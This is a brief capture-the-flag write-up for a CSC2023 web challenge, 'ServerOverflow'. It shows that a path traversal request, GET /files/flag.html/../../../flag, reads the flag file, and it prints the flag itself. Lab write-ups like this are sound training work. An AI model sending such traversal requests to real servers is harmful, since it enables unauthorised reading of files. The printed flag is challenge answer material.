CSC2023 - [Web] - ServerOverflow

Challenge Description

SSCIT student made an application as fyp and he claim that this is no vulnerability in this server\n> NOTE: It might take upto 2 minutes for the container to start.

Solution

On opening the challenge we would be given flag url

On following the instructions we get

This tells us that flag is at /flag

Simple Path traversal vulnerability

GET /files/flag.html/../../../flag

Flag

CSC{N0w_I_w0uld_n0t_sm1le_on_y0u}

Writeups 2023 © RootxRAN.